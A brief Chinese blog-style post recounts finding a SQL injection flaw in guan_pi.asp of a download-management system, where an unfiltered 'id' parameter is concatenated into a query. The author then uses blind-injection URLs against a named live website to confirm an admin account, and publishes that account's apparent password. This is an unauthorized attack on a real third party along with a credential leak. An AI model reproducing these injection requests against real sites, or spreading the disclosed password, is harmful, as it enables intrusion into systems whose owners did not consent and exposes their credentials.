看了N.E.V.E.R写的很多关于sql injection的文章后,很有感触,真佩服他能耐心看得下那么多的代码,并能发现那么多的漏洞。在他的感染下,我也试着看一些代码,复杂的代码不看,我看些简单的:先看看书生下载管理系统吧,我看的是5.5版的,应该是最新版的吧。我也来”倒“着看(实际上是在床上看),哈哈~~ ^-^先看看soft.asp吧,看这个dim zhuid,typeid,types,zhuid = Request.QueryString("id")if id="" or not IsNumeric(id) thenResponse.Write("错误参数")Response.Endelse好象对id过滤很严哦反正我从这里是下不了手的,主要是因为我很笨!后来看着看着就睡着了,醒来后,突然眼睛一亮发现一个guan_pi.asp文件,里面是这样写的dim sql,rsdim tempdim idim idid=request("id")set rs=server.createobject("adodb.recordset")sql="select review,title,reviewcount from learning where articleid="&idrs.open sql,conn,1,1%>用never的话说,这是最垃圾的写法。对id没有做任何过滤哈哈,看样子有戏了!提交:http://www.jing0.com/down/guan_pi.asp?ID=(select%20count(*)%20from%20password%20where%20id=1) ---------对此站点的管理员持抱歉态度接下来应该是最熟悉的:http://www.jing0.com/down/guan_pi.asp?ID=(select%20count(*)%20from%20password%20where%20id=1%20and%20name='admin')http://www.jing0.com/down/guan_pi.asp?ID=(select%20count(*)%20from%20password%20where%20id=1%20and%20password='19831112.520') ---这个密码挺有意思的,典型的中国密码 我想找找官方网站,好象打不开,就算了,以后再去找吧。恩,继续睡觉